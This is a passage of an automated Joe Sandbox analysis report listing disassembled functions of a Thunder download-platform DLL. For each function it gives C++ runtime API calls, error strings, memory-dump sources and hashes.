                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@ExceptionThrow$??1?$basic_string@?assign@?$basic_string@V12@
                                                                                                                                              • String ID: S
                                                                                                                                              • API String ID: 2831823523-543223747
                                                                                                                                              • Opcode ID: 7e1c75d00faac54d2a5cf5a1d82adef04dba16750f7a11af559bdf847db4d09d
                                                                                                                                              • Instruction ID: 8bf02235b5153f7712f9d9c3b128d624db6b3c3292b39eda6360b1097654bec0
                                                                                                                                              • Opcode Fuzzy Hash: 7e1c75d00faac54d2a5cf5a1d82adef04dba16750f7a11af559bdf847db4d09d
                                                                                                                                              • Instruction Fuzzy Hash: 06510134A05245CFD714DF04C688A9AF7F2FF85328F29C19AC8495B352CB75AE4ACB85
                                                                                                                                              Function 10005011 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 10005016
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(map/set<T> too long,00000000,10311338,?,?,?,?,?,?,10006C17,00000000,?,?,00000000,?,?), ref: 10005034
                                                                                                                                                • Part of subcall function 10001598: __EH_prolog.LIBCMT ref: 1000159D
                                                                                                                                                • Part of subcall function 10001598: ??0exception@@QAE@XZ.MSVCR71(?,?,1001E6D1,?,?,?,?), ref: 100015A9
                                                                                                                                                • Part of subcall function 10001598: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,1001E6D1,?,?,?,?), ref: 100015BF
                                                                                                                                              • _CxxThrowException.MSVCR71 ref: 1000505A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@H_prologU?$char_traits@V?$allocator@$??0exception@@ExceptionThrowV01@@
                                                                                                                                              • String ID: map/set<T> too long
                                                                                                                                              • API String ID: 1391971735-1285458680
                                                                                                                                              • Opcode ID: 48789c0c12ebc827c6c8203bbc2509d1bccdd476e4809369352c37a406807bed
                                                                                                                                              • Instruction ID: f32a2f961b285677ad352d321e49fda82d1f15d7c97faa85a9f17f74f26a5471
                                                                                                                                              • Opcode Fuzzy Hash: 48789c0c12ebc827c6c8203bbc2509d1bccdd476e4809369352c37a406807bed
                                                                                                                                              • Instruction Fuzzy Hash: 7A515374600241DFD715CF08C484A9AFBE5FF4A344F198689E86A9B366C7B2FC81CB90
                                                                                                                                              Function 100890A8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,?,?,?), ref: 100890ED
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 10089115
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,?,?,?), ref: 10089165
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 1008918D
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,?,?,?), ref: 100891DD
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 10089205
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP71(00000000,?,00000000,?,?,?,00000000), ref: 10089262
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,?,?,?), ref: 10089275
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 1008929D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 10089358
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(?), ref: 10089374
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@ExceptionThrow$??1?$basic_string@?assign@?$basic_string@V12@
                                                                                                                                              • String ID: S
                                                                                                                                              • API String ID: 2831823523-543223747
                                                                                                                                              • Opcode ID: 38ebf9323a939eef2f3f1abf8f7853db7195673599e9fe3f4ce6c31c314f8367
                                                                                                                                              • Instruction ID: 695b0c2174dcd388f64555487d591551396d9889f1d094048baed176469115c6
                                                                                                                                              • Opcode Fuzzy Hash: 38ebf9323a939eef2f3f1abf8f7853db7195673599e9fe3f4ce6c31c314f8367
                                                                                                                                              • Instruction Fuzzy Hash: 21511234A05245CFD714DF04C688A99B7F2FF85328F29C1AAD8495B352CB35AE46CF81
                                                                                                                                              Function 10089120 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 105COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,?,?,?), ref: 10089165
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 1008918D
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,?,?,?), ref: 100891DD
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 10089205
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP71(00000000,?,00000000,?,?,?,00000000), ref: 10089262
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,?,?,?), ref: 10089275
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 1008929D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 10089358
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(?), ref: 10089374
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@ExceptionThrow$??1?$basic_string@?assign@?$basic_string@V12@
                                                                                                                                              • String ID: S
                                                                                                                                              • API String ID: 2831823523-543223747
                                                                                                                                              • Opcode ID: 65cd149428ef390bc381c50d908bb352a1890084acea6296b5c63bfb14529c05
                                                                                                                                              • Instruction ID: ac40572b880846a1b56a83ebd9c4efef7b2963eb8310b569a9a56b00ba3f3b0f
                                                                                                                                              • Opcode Fuzzy Hash: 65cd149428ef390bc381c50d908bb352a1890084acea6296b5c63bfb14529c05
                                                                                                                                              • Instruction Fuzzy Hash: F3412534A05245CFD714DF14C988A9AB7F2FF85318F29C1AED8495B352CB35AE46CB81
                                                                                                                                              Function 100496B0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 103COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(00000000), ref: 100497B8
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$??3@H_prologV01@@
                                                                                                                                              • String ID: .\file_asyn_io_helper.cpp$operation_ptr != NULL$thunder_assert
                                                                                                                                              • API String ID: 1027865869-4018520618
                                                                                                                                              • Opcode ID: 6d945d44609c5b84861e85ea5ed6af8a5b67c5c5ad00ff7aa8f6fd58b6bf1ba3
                                                                                                                                              • Instruction ID: 779806786cc90e2e4ad30b48dbc5ac505cf307c7904b925fed1efa8be4a51270
                                                                                                                                              • Opcode Fuzzy Hash: 6d945d44609c5b84861e85ea5ed6af8a5b67c5c5ad00ff7aa8f6fd58b6bf1ba3
                                                                                                                                              • Instruction Fuzzy Hash: 01314B7A6047419FC304DF18D881A6BB3E5FFD8624F544A2DF99A93342DB31B914CB92
                                                                                                                                              Function 10089198 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,?,?,?), ref: 100891DD
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 10089205
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP71(00000000,?,00000000,?,?,?,00000000), ref: 10089262
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,?,?,?), ref: 10089275
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 1008929D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 10089358
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(?), ref: 10089374
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@ExceptionThrow$??1?$basic_string@?assign@?$basic_string@V12@
                                                                                                                                              • String ID: S
                                                                                                                                              • API String ID: 2831823523-543223747
                                                                                                                                              • Opcode ID: 15eb2ff93de9c3d1ccb75ad784d22bf2f687d919053cb58c50bb2467aecf36e3
                                                                                                                                              • Instruction ID: 131924a2a59194d4d8fde8d36267e0f02ba13c7175e0e80826e664a26681d8f5
                                                                                                                                              • Opcode Fuzzy Hash: 15eb2ff93de9c3d1ccb75ad784d22bf2f687d919053cb58c50bb2467aecf36e3
                                                                                                                                              • Instruction Fuzzy Hash: 68412634A01249DFD714DF54C988B9AB7F2FF85314F29C1AED84A5B242CB35AE45CB41
                                                                                                                                              Function 100E1430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(data_input_for_p2p,00000000,?), ref: 100E145B
                                                                                                                                                • Part of subcall function 10014360: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,00000000,10118FC7), ref: 10014371
                                                                                                                                                • Part of subcall function 10014360: InterlockedIncrement.KERNEL32(10311E80), ref: 10014383
                                                                                                                                                • Part of subcall function 10014360: RtlInitializeCriticalSection.NTDLL(00000024), ref: 1001438D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100E147F
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?), ref: 100E14C2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??1?$basic_string@??3@CriticalIncrementInitializeInterlockedSectionV01@@
                                                                                                                                              • String ID: data_input_for_p2p
                                                                                                                                              • API String ID: 3166304441-2432989058
                                                                                                                                              • Opcode ID: eea4a97af0a796f5c621646f3a066b60b957f95788da29e078be4262075780da
                                                                                                                                              • Instruction ID: 1868fa6f9f0c8bad54e21721e13bca4cfae226a00918abdcc81f8a83c76a7b9e
                                                                                                                                              • Opcode Fuzzy Hash: eea4a97af0a796f5c621646f3a066b60b957f95788da29e078be4262075780da
                                                                                                                                              • Instruction Fuzzy Hash: B43146B56047829FC320CF5AC884A5AFBF9FB88714F50492EF58A83790C775A849CB52
                                                                                                                                              Function 10089210 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP71(00000000,?,00000000,?,?,?,00000000), ref: 10089262
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,?,?,?), ref: 10089275
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 1008929D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 10089358
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(?), ref: 10089374
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@?assign@?$basic_string@ExceptionThrowV12@
                                                                                                                                              • String ID: S
                                                                                                                                              • API String ID: 3539582707-543223747
                                                                                                                                              • Opcode ID: 6d67d9e11e87548ec96450e1b865b950cc3cae5cf55b3d670facdd6a6e49ba08
                                                                                                                                              • Instruction ID: 52de34e9447b5c49c70446742e8cfe9e82b37b84220d25d148fcabf31ce63b05
                                                                                                                                              • Opcode Fuzzy Hash: 6d67d9e11e87548ec96450e1b865b950cc3cae5cf55b3d670facdd6a6e49ba08
                                                                                                                                              • Instruction Fuzzy Hash: 92316830A01248DFD714DF58C988BAAB7F1FF85314F2980AED84A5B242CB36AE45CB41
                                                                                                                                              Function 10079380 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • strstr.MSVCR71(?,), ref: 100793B9
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,00000000), ref: 100793CE
                                                                                                                                                • Part of subcall function 100258AC: malloc.MSVCR71(100104C9,?,100104C9,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100258C5
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?), ref: 10079434
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@mallocstrstr
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4179029228-2344752452
                                                                                                                                              • Opcode ID: 81ad69ace99300c2968c105e8e6011a695aaf188b2bae949b62654470defb585
                                                                                                                                              • Instruction ID: c92974e0417696171e0df598aba1d6d9914375e9c9dd127d1fd46919240c971b
                                                                                                                                              • Opcode Fuzzy Hash: 81ad69ace99300c2968c105e8e6011a695aaf188b2bae949b62654470defb585
                                                                                                                                              • Instruction Fuzzy Hash: D321AE712082819FC754CB28D959B5BBBE4FB99760F400A6EF49AC3291DB34D805CB56
                                                                                                                                              Function 100A4280 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(not opened, can't query filename_header_value), ref: 100A42B5
                                                                                                                                                • Part of subcall function 10001598: __EH_prolog.LIBCMT ref: 1000159D
                                                                                                                                                • Part of subcall function 10001598: ??0exception@@QAE@XZ.MSVCR71(?,?,1001E6D1,?,?,?,?), ref: 100015A9
                                                                                                                                                • Part of subcall function 10001598: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,1001E6D1,?,?,?,?), ref: 100015BF
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B6BA0,?), ref: 100A42D7
                                                                                                                                                • Part of subcall function 10095030: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Content-Disposition,00000000), ref: 10095089
                                                                                                                                                • Part of subcall function 10095030: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100950B5
                                                                                                                                                • Part of subcall function 10095030: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(httpresponse_header don't have field: Content-Disposition,00000000), ref: 100950D7
                                                                                                                                                • Part of subcall function 10095030: _CxxThrowException.MSVCR71(?,102BBD20), ref: 10095100
                                                                                                                                                • Part of subcall function 10095030: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,00000000), ref: 10095110
                                                                                                                                                • Part of subcall function 10095030: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(filename=,00000000,00000009), ref: 10095140
                                                                                                                                                • Part of subcall function 10095030: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 1009515B
                                                                                                                                                • Part of subcall function 10095030: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100954E1
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 100A42F3
                                                                                                                                              Strings
                                                                                                                                              • not opened, can't query filename_header_value, xrefs: 100A42AC
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??1?$basic_string@ExceptionThrowV01@@$??0exception@@?find@?$basic_string@H_prolog
                                                                                                                                              • String ID: not opened, can't query filename_header_value
                                                                                                                                              • API String ID: 3030010980-695616506
                                                                                                                                              • Opcode ID: 83f630d59e1d35258b4053ee755060a4f5aca9babc73d43bbf6bf072602e3d21
                                                                                                                                              • Instruction ID: 5cf2f836502d0956f89a8f1cdb04026eedab45e33b05a241c5a1b5403e6b5cb1
                                                                                                                                              • Opcode Fuzzy Hash: 83f630d59e1d35258b4053ee755060a4f5aca9babc73d43bbf6bf072602e3d21
                                                                                                                                              • Instruction Fuzzy Hash: 5B114F7A604780DFC215DB59CC54A9BF3E9FBD9750F008A2EF55A93340CB35A906CB92
                                                                                                                                              Function 100A4340 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(not opened, can't query file_type_header_value), ref: 100A4375
                                                                                                                                                • Part of subcall function 10001598: __EH_prolog.LIBCMT ref: 1000159D
                                                                                                                                                • Part of subcall function 10001598: ??0exception@@QAE@XZ.MSVCR71(?,?,1001E6D1,?,?,?,?), ref: 100015A9
                                                                                                                                                • Part of subcall function 10001598: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,1001E6D1,?,?,?,?), ref: 100015BF
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B6BA0,?), ref: 100A4397
